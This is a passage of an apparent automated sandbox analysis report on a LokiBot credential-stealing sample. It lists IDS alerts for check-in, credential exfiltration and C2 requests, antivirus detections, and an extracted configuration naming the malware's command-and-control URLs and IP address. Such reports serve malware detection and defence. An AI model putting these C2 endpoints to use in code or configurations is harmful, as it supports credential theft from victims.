Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:25.351055
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:16.164912
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://136.244.109.75/index.php/1748937"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Virustotal: Detection: 33%			Perma Link

Multi AV Scanner detection for submitted file

Source: gunzipped.exe

ReversingLabs: Detection: 18%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: gunzipped.exe

Joe Sandbox ML: detected

Source: gunzipped.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gunzipped.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 4x nop then jmp 052FAB1Ah		0_2_052FAC9B
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 4x nop then jmp 06329CEAh		9_2_06329E6B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49705 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49706 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49714 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49716 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 136.244.109.75:80
